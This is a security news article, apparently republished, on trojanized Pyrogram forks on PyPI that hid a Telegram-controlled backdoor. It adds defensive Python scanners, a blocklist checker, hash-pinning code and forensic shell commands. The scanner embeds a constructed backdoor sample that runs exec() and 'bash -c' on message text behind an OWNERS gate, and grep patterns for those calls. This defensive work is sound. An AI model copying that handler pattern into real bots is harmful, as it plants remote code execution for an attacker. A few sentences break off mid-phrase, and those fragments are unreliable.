Operation Navy Ghost: Trojanized Pyrogram Packages Secretly Turn Telegram Bots Into Remote-Controlled Backdoors + Video


Introduction: A Trusted Python Library Becomes the Perfect Cyber Trap

Open source software has become the backbone of modern application development, allowing developers to build powerful services in minutes rather than months. However, the same trust that fuels the open source ecosystem can also become its greatest weakness. Cybercriminals increasingly exploit popular libraries by publishing malicious forks that appear legitimate but secretly contain dangerous backdoors.

A newly uncovered cyber-espionage campaign known as Operation Navy Ghost demonstrates exactly how devastating these attacks can be. Instead of targeting end users, the attackers went after Python developers maintaining Telegram bots, embedding hidden malware inside multiple fake versions of the well-known Pyrogram framework. Once installed, these seemingly harmless packages quietly granted remote access to production servers, exposing sensitive databases, API credentials, cloud infrastructure, and private Telegram conversations without the victims realizing it.

Operation Navy Ghost Targets Telegram Bot Developers

Security researchers from Checkmarx have uncovered an extensive software supply chain attack that has been active since November 2025, specifically targeting Python developers who build Telegram bots using the Pyrogram framework.

Rather than exploiting vulnerabilities in Telegram itself, the attackers created multiple malicious forks of the legitimate Pyrogram library and uploaded them to the Python Package Index (PyPI). These packages appeared to be normal alternatives or customized versions of the original framework, making them difficult to distinguish from legitimate projects.

Developers installing these fake packages unknowingly introduced a fully functional remote access backdoor into their production environments.

Pyrogram’s Popularity Made It an Attractive Target

Although the original Pyrogram project has not received active maintenance since 2023, it remains widely used across the Python ecosystem.

With approximately 350,000 monthly downloads and more than 1,400 GitHub forks, Pyrogram continues to power thousands of Telegram automation projects, administrative bots, monitoring systems, customer support services, and personal userbots.

This widespread adoption created an ideal attack surface. Instead of compromising Pyrogram itself, attackers simply published convincing forks under different names, expecting developers to install them during dependency searches.

Eight Malicious Packages Were Uploaded to PyPI

Researchers identified eight separate malicious packages distributed across PyPI between November 2025 and June 2026.

The known malicious packages include:

VLifeGram

VLife-Gram

pyrogram-navy

pyrogram-styled

pyrogram-zeeb

kelragram

sepgram

pyrogram-kelra

Collectively, these packages accumulated tens of thousands of downloads before being identified.

Among them, pyrogram-styled proved especially successful, recording more than 15,000 downloads, dramatically increasing the campaign’s potential victim count.

The Hidden Backdoor Inside Every Package

Each malicious package shipped a near-verbatim copy of the legitimate Pyrogram source, so a quick comparison against the upstream project looks normal and the packages behave exactly like Pyrogram for ordinary bot code.

Hidden inside the helper modules, however, researchers discovered an additional file named secret.py.

This file silently activated every time a Telegram bot started or imported the library, registering invisible Telegram command handlers that only specific attacker-controlled accounts could access.

Unlike traditional malware that attempts to infect users immediately, this backdoor patiently waited for commands sent directly through Telegram itself.

Attackers Could Execute Python Code Remotely

One of the

By sending specially crafted Telegram commands, attackers could instantly interact with the running application and access its execution environment.

That meant they could inspect environment variables, steal authentication secrets, examine API keys, manipulate application memory, and even interact directly with active Telegram sessions.

Since the malicious commands executed inside the

Remote Shell Access Opened the Entire Server

Beyond executing Python code, the malware also provided complete shell access.

Attackers could issue Linux commands through Telegram, allowing them to browse directories, steal configuration files, inspect databases, read sensitive documents, or deploy additional malware.

Researchers demonstrated that commands equivalent to reading sensitive operating system files could be executed remotely, proving that any file readable by the account the bot runs under could be exfiltrated from a compromised server.
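The mechanism described in this and the two preceding sections (a helper module named secret.py, a hard-coded OWNERS list, hidden Telegram handlers that reach exec and a shell) can be triaged statically without ever importing the suspect package. The scanner below is an added example written for this page, not Checkmarx's tooling and not the malware's code. The indicator names it looks for are assumptions drawn from the article's description and from Pyrogram's public API (Client.add_handler, Client.on_message, handlers.MessageHandler); the two sample modules are constructed, inert text used only as scanner input.

```python
"""AST triage for the backdoor shape the article describes in trojanized
Pyrogram forks. Added example for this page, not Checkmarx's or the
attackers' code; it parses source text and never executes it."""
from __future__ import annotations

import ast
import pathlib
from dataclasses import dataclass

# Assumed indicator names, from the article plus Pyrogram's public API.
HANDLER_NAMES = {"add_handler", "on_message", "MessageHandler", "CommandHandler"}
EXEC_CALLS = {"exec", "eval"}
SHELL_CALLS = {("subprocess", "run"), ("subprocess", "Popen"), ("os", "system")}
SUSPICIOUS_FILENAMES = {"secret.py"}


@dataclass
class Finding:
    file: str
    line: int
    kind: str  # filename | owners-list | exec | shell | handler | unparseable
    detail: str


def _call_name(node: ast.Call) -> tuple[str | None, str]:
    """('mod', 'attr') for mod.attr(...); (None, 'name') for name(...) or a.b.name(...)."""
    func = node.func
    if isinstance(func, ast.Name):
        return None, func.id
    if isinstance(func, ast.Attribute):
        base = func.value
        return (base.id if isinstance(base, ast.Name) else None), func.attr
    return None, ""


def scan_source(src: str, filename: str) -> list[Finding]:
    """Scan one module's source text for the indicators; the code is never run."""
    findings: list[Finding] = []
    if pathlib.PurePath(filename).name in SUSPICIOUS_FILENAMES:
        findings.append(Finding(filename, 0, "filename", "module named secret.py"))
    try:
        tree = ast.parse(src, filename=filename)
    except SyntaxError as exc:
        findings.append(Finding(filename, exc.lineno or 0, "unparseable", str(exc)))
        return findings
    for node in ast.walk(tree):  # ast.walk also visits decorator expressions
        if isinstance(node, ast.Assign):
            if any(isinstance(t, ast.Name) and t.id == "OWNERS" for t in node.targets):
                findings.append(Finding(filename, node.lineno, "owners-list", "hard-coded OWNERS"))
        elif isinstance(node, ast.Call):
            mod, attr = _call_name(node)
            if mod is None and attr in EXEC_CALLS:
                findings.append(Finding(filename, node.lineno, "exec", f"{attr}()"))
            elif (mod, attr) in SHELL_CALLS:
                findings.append(Finding(filename, node.lineno, "shell", f"{mod}.{attr}()"))
            elif attr in HANDLER_NAMES:
                findings.append(Finding(filename, node.lineno, "handler", attr))
    return findings


def is_backdoor_like(findings: list[Finding]) -> bool:
    """A Telegram handler plus an execution primitive in the same module."""
    kinds = {f.kind for f in findings}
    return "handler" in kinds and bool(kinds & {"exec", "shell"})


def scan_tree(root: str | pathlib.Path) -> dict[str, list[Finding]]:
    """Scan every .py under root, e.g. site-packages/pyrogram, keyed by path."""
    return {str(p): scan_source(p.read_text(encoding="utf-8", errors="replace"), str(p))
            for p in sorted(pathlib.Path(root).rglob("*.py"))}


# Constructed sample with the described shape (OWNERS gate, handlers, exec, shell).
SAMPLE_SECRET_PY = '''
from pyrogram import filters
from pyrogram.handlers import MessageHandler
import subprocess
OWNERS = [111111111, 222222222]  # constructed placeholder IDs
def _py(client, message):
    if message.from_user.id in OWNERS:
        exec(message.text.split(maxsplit=1)[1])
def _sh(client, message):
    if message.from_user.id in OWNERS:
        subprocess.run(["bash", "-c", message.text.split(maxsplit=1)[1]])
def install(app):
    app.add_handler(MessageHandler(_py, filters.command("py")))
    app.add_handler(MessageHandler(_sh, filters.command("sh")))
'''

# Constructed ordinary bot: registers a handler but nothing dynamic behind it.
SAMPLE_BENIGN_BOT = '''
from pyrogram import Client, filters
app = Client("demo")
@app.on_message(filters.command("start"))
async def start(client, message):
    await message.reply_text("hello")
'''

if __name__ == "__main__":
    import tempfile
    with tempfile.TemporaryDirectory() as tmp:
        root = pathlib.Path(tmp)
        (root / "helpers").mkdir()
        (root / "helpers" / "secret.py").write_text(SAMPLE_SECRET_PY)
        (root / "bot.py").write_text(SAMPLE_BENIGN_BOT)
        for path, found in scan_tree(root).items():
            print(path, "backdoor-like" if is_backdoor_like(found) else "clean")
            for f in found:
                print(f"  line {f.line}: {f.kind}: {f.detail}")
```

Point scan_tree at the site-packages directory of each deployed bot; the verdict is per module, so a normal handler module is not flagged merely for registering commands, while a module that pairs a handler with exec or subprocess is.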

Large outputs exceeding

Production Servers Were the Primary Objective

The malware intentionally ignored ordinary Telegram user accounts.

Instead, it activated only when detecting Telegram bot accounts typically deployed on production infrastructure.

This selective behavior significantly reduced detection while maximizing the value of each compromised system.

Production Telegram bots often possess privileged access to:

Cloud platforms

Internal APIs

Customer databases

Authentication tokens

Payment systems

Environment variables

Encryption secrets

By focusing exclusively on production bots, attackers dramatically increased the likelihood of accessing high-value infrastructure.

Built-In Protection for the Attackers

Researchers also discovered a hardcoded list named OWNERS embedded inside the malware.

This list contained authorized Telegram account identifiers that granted exclusive administrative access to the hidden command interface.

Interestingly, the malware disabled itself whenever the Telegram account it was running under belonged to one of these owners, preventing the operators from accidentally backdooring their own bots.

This small detail strongly suggests a carefully engineered and professionally managed campaign rather than an opportunistic attack.

Evidence Points to a Single Threat Actor

Although the malicious packages appeared under multiple PyPI publisher accounts, Checkmarx concluded they were operated by a single threat actor.

Several technical indicators supported this assessment, including:

Identical backdoor implementations

Shared Telegram owner identifiers

Matching command structures

Similar infrastructure

Consistent coding techniques

Reused operational patterns

These shared characteristics reveal a coordinated supply chain campaign rather than isolated malicious uploads.

Immediate Actions for Potential Victims

Organizations that installed any of the affected packages should assume their infrastructure has been compromised.

Immediate response actions include:

Remove all malicious packages.

Audit every installed Python dependency.

Rotate all passwords and API credentials.

Revoke Telegram bot tokens.

Replace exposed cloud credentials.

Review server logs for unusual Telegram activity.

Scan systems for additional persistence mechanisms.

Rebuild affected environments if compromise is confirmed.

Because the malware could execute arbitrary commands, simply uninstalling the package does not guarantee that attackers no longer have access.

Deep Analysis: Detecting and Investigating Trojanized Python Packages

Modern supply chain attacks rarely rely on software vulnerabilities. Instead, they abuse developer trust. Detecting these threats requires examining dependencies, package integrity, runtime behavior, and filesystem modifications across development and production systems.

Useful Linux investigation commands include:

# Inventory the environment and look for the named packages
pip list
pip freeze
pip show pyrogram
pip show pyrogram-styled
pip show VLifeGram
pip check
pipdeptree
cat requirements.txt

# Locate the hidden module and the indicators described above
# (quote patterns containing shell metacharacters such as "(" or a space)
find . -name "secret.py"
grep -R "OWNERS" .
grep -R "/asu" .
grep -R "/asi" .
grep -R "CommandHandler" .
grep -R "MessageHandler" .   # Pyrogram's own handler class name
grep -R "exec(" .
grep -R "subprocess" .
grep -R "os.system" .
grep -R "bash -c" .
grep -R "telegram" .
find / -name "*.py" 2>/dev/null
sha256sum secret.py

# Remove every package from the list (uninstalling alone does not evict an attacker who already ran commands)
pip uninstall -y VLifeGram VLife-Gram pyrogram-navy pyrogram-styled pyrogram-zeeb kelragram sepgram pyrogram-kelra

# Runtime, network and persistence review
history
env
printenv
ps aux
ss -tulpn
netstat -antp
lsof -i
journalctl -xe
systemctl list-units
crontab -l
ls -la ~/.config
ls -la ~/.local
sudo ausearch -m EXECVE

# Repository, container and cluster state
git status
git diff
git log
docker ps
docker inspect <container>
kubectl get pods
kubectl logs <pod-name>

# Rebuild in a clean virtual environment and audit the remaining dependencies
python3 -m venv cleanenv
. cleanenv/bin/activate
pip install --upgrade pip
pip cache purge
pip-audit

Routine dependency verification, software bill of materials (SBOM) generation, package signature validation, and continuous runtime monitoring should become standard practices for every organization relying on open source software. Supply chain attacks increasingly bypass traditional antivirus solutions because the malicious code arrives disguised as trusted software updates rather than conventional malware.
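The "Audit every installed Python dependency" step in the response list above and the pip inventory commands in this section both come down to one check: does any requirement file or installed distribution name one of the eight packages? The script below is an added example for this page, not Checkmarx's tooling. It normalizes names the way PyPI does (PEP 503: runs of "-", "_" and "." collapse to one "-" and the result is lower-cased), so "VLife-Gram", "vlife_gram" and "VLIFE.GRAM" all compare equal, while "VLifeGram" stays a distinct name and is matched on its own. The requirements text in the test is constructed.

```python
"""Blocklist check for the eight package names the article lists, over
requirements files, pip freeze output and the running interpreter's
installed distributions. Added example; not part of the article."""
from __future__ import annotations

import re
from importlib import metadata

NAVY_GHOST_PACKAGES = [
    "VLifeGram", "VLife-Gram", "pyrogram-navy", "pyrogram-styled",
    "pyrogram-zeeb", "kelragram", "sepgram", "pyrogram-kelra",
]


def normalize(name: str) -> str:
    """PEP 503 project-name normalization, as PyPI applies it."""
    return re.sub(r"[-_.]+", "-", name).lower()


BLOCKLIST = {normalize(n) for n in NAVY_GHOST_PACKAGES}

_REQ_NAME = re.compile(r"^\s*([A-Za-z0-9][A-Za-z0-9._-]*)")


def requirement_name(line: str) -> str | None:
    """Project name from one requirements.txt or pip freeze line.

    Comments, option lines (-r, -e, --hash, ...) and URL requirements are skipped;
    a URL requirement has to be reviewed by hand because its name is not on the line.
    """
    line = line.split("#", 1)[0].strip()
    if not line or line.startswith("-") or "://" in line:
        return None
    m = _REQ_NAME.match(line)
    return m.group(1) if m else None


def find_blocklisted(requirements_text: str) -> list[tuple[int, str]]:
    """(line number, name as written) for every blocklisted requirement."""
    hits = []
    for lineno, line in enumerate(requirements_text.splitlines(), 1):
        name = requirement_name(line)
        if name and normalize(name) in BLOCKLIST:
            hits.append((lineno, name))
    return hits


def installed_blocklisted() -> list[str]:
    """'name==version' for blocklisted distributions in this interpreter."""
    found = []
    for dist in metadata.distributions():
        name = dist.metadata["Name"]
        if name and normalize(name) in BLOCKLIST:
            found.append(f"{name}=={dist.version}")
    return sorted(found)


if __name__ == "__main__":
    import sys
    for path in sys.argv[1:]:
        with open(path, encoding="utf-8") as fh:
            for lineno, name in find_blocklisted(fh.read()):
                print(f"{path}:{lineno}: blocklisted package {name}")
    for entry in installed_blocklisted():
        print(f"installed: {entry}")
```

Run it inside each bot's virtual environment with its requirements files as arguments; piping `pip freeze` into a file and passing that works too, since freeze output is valid requirements syntax. Extend NAVY_GHOST_PACKAGES as new names are published.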

What Undercode Say:

Operation Navy Ghost highlights one of the fastest-growing threats in cybersecurity: software supply chain compromise. Rather than attacking operating systems or exploiting zero-day vulnerabilities, adversaries now target developer trust, knowing that a single poisoned dependency can infiltrate thousands of production environments.

The campaign demonstrates careful operational planning. The attackers selected a mature but no longer actively maintained project with a large user base, reducing the likelihood of rapid security updates while maximizing potential victims.

Publishing several differently named forks significantly increased visibility within package searches. Developers looking for enhanced or customized versions could unknowingly install malicious packages without raising suspicion.

The backdoor itself is technically elegant. Instead of creating noisy outbound network traffic, it leverages Telegram as its command-and-control channel, blending malicious communications with legitimate application traffic.

Restricting activation to Telegram bot accounts shows a clear understanding of enterprise infrastructure. Production bots frequently possess elevated permissions, making them ideal targets for credential theft and infrastructure reconnaissance.

The malware also minimizes operational risk for its creators by suppressing errors and disabling unnecessary logging, reducing opportunities for defenders to notice suspicious behavior.

Using Telegram messages to return stolen information eliminates the need for custom command servers, lowering operational costs while increasing resilience.

Embedding owner identifiers directly into the malware further demonstrates disciplined campaign management and prevents accidental exposure during attacker testing.

This attack reinforces that dependency management is no longer merely a software engineering concern. It has become a critical cybersecurity responsibility.

Organizations should maintain internal mirrors of trusted packages whenever possible instead of downloading dependencies directly from public repositories during production deployments.

Dependency pinning should be mandatory to reduce the risk of unintentionally installing newly uploaded malicious versions.

Continuous Software Composition Analysis (SCA) should monitor every dependency update before deployment.

Automated integrity verification using cryptographic hashes provides another valuable defensive layer.
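The three preceding points (pinning, SCA before deployment, and hash verification) meet in pip's hash-pinned requirements format, where each dependency is pinned with "==" and carries one or more "--hash=sha256:..." values, and `pip install --require-hashes` refuses anything unpinned or mismatching. The code below is an added example for this page, not pip's implementation: it parses that format, verifies a downloaded artifact against it, and emits a pin line for an artifact you have reviewed. The artifact bytes and requirement text in the test are constructed.

```python
"""Parse hash-pinned requirements (the --require-hashes format) and verify an
artifact before installation. Added example for this page, not pip's code."""
from __future__ import annotations

import hashlib
import re
from dataclasses import dataclass, field


@dataclass
class Pin:
    name: str
    version: str
    sha256: set[str] = field(default_factory=set)


_PIN = re.compile(r"^([A-Za-z0-9][A-Za-z0-9._-]*)==([^\s;\\]+)")
_HASH = re.compile(r"--hash=sha256:([0-9a-f]{64})")


def _key(name: str) -> str:
    """PEP 503 normalization so 'Pyrogram' and 'pyrogram' are the same project."""
    return re.sub(r"[-_.]+", "-", name).lower()


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def parse_hashed_requirements(text: str) -> dict[str, Pin]:
    """Every entry must be '==' pinned and carry at least one sha256 hash.

    Backslash-continued lines (pip-compile's layout) are joined first.
    Raises ValueError on the first entry that would make --require-hashes fail.
    """
    pins: dict[str, Pin] = {}
    for raw in text.replace("\\\n", " ").splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line or line.startswith("-"):
            continue  # comments and option lines such as --index-url
        m = _PIN.match(line)
        if not m:
            raise ValueError(f"not pinned with '==': {line!r}")
        hashes = set(_HASH.findall(line))
        if not hashes:
            raise ValueError(f"no sha256 hash for {m.group(1)}")
        pins[_key(m.group(1))] = Pin(m.group(1), m.group(2), hashes)
    return pins


def is_fully_pinned(text: str) -> bool:
    try:
        parse_hashed_requirements(text)
        return True
    except ValueError:
        return False


def verify_artifact(data: bytes, project: str, pins: dict[str, Pin]) -> bool:
    """True only if the project is pinned and the artifact matches a pinned hash.

    An unpinned project fails closed, mirroring --require-hashes.
    """
    pin = pins.get(_key(project))
    if pin is None:
        return False
    return sha256_hex(data) in pin.sha256


def pin_line(name: str, version: str, data: bytes) -> str:
    """Requirement line for an artifact you have already reviewed."""
    return f"{name}=={version} --hash=sha256:{sha256_hex(data)}"


if __name__ == "__main__":
    blob = b"constructed stand-in for a downloaded wheel"  # constructed sample
    req = pin_line("pyrogram", "2.0.106", blob)
    pins = parse_hashed_requirements(req)
    print(req)
    print("genuine artifact:", verify_artifact(blob, "Pyrogram", pins))
    print("tampered artifact:", verify_artifact(blob + b"x", "Pyrogram", pins))
    print("unpinned lookalike:", verify_artifact(blob, "pyrogram-styled", pins))
```

The last line of the demo is the point for this campaign: a lookalike fork such as pyrogram-styled is rejected not because anyone recognized the name, but because nothing in the pinned set vouches for it. Generate pins only from artifacts pulled from your internal mirror after review, then deploy with `pip install --require-hashes -r requirements.txt`.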

Developers should review package maintainers before adopting unfamiliar forks.

Even minor package name variations deserve careful scrutiny.

Runtime behavior monitoring remains equally important because malicious packages may appear legitimate during installation.

Least-privilege principles should limit what Telegram bots can access within production environments.

Environment variables containing secrets should be minimized wherever practical.

Credential rotation plans should exist before incidents occur rather than afterward.

Organizations should assume that any compromised production bot may expose cloud credentials.

Infrastructure-as-Code repositories should also be reviewed after such incidents.

Incident response teams should investigate persistence beyond the initial malicious package.

Containerized workloads require image rebuilding rather than simple package removal.

Comprehensive logging dramatically improves forensic investigations.

Security awareness training should include software supply chain risks alongside phishing education.

Code reviews should examine dependency additions with the same rigor as application logic.

SBOM adoption is becoming increasingly essential for rapid incident response.

Package reputation scoring may become a standard enterprise security control.

Artificial intelligence will likely improve detection of suspicious package behaviors before installation.

Unfortunately, attackers will also leverage AI to generate increasingly convincing malicious libraries.

The software ecosystem continues expanding faster than manual review can manage.

Automated trust verification will therefore become indispensable.

Developer productivity must always be balanced against security validation.

Trust should never replace verification, especially within open source ecosystems.

Operation Navy Ghost serves as another reminder that modern cyberattacks often begin with a single seemingly harmless installation command.

✅ Fact: Multiple malicious PyPI packages impersonating Pyrogram forks were identified by Checkmarx during the Operation Navy Ghost investigation.

✅ Fact: The malware allowed remote execution of both Python code and shell commands through hidden Telegram command handlers, enabling attackers to access sensitive files, credentials, and production environments.

✅ Fact: Security experts recommend removing the malicious packages immediately, rotating every exposed credential, revoking Telegram bot tokens, and thoroughly investigating systems for persistence because uninstalling the package alone may not eliminate attacker access.

Prediction

(+1) Software repositories will continue introducing stronger package verification, publisher validation, cryptographic signing, and AI-powered malware detection to reduce the success of dependency poisoning attacks.

(-1) Threat actors will increasingly target developers instead of end users, creating more sophisticated malicious forks of popular open source projects that remain difficult to distinguish from legitimate software until after production deployment.


References:

Reported By: www.bleepingcomputer.com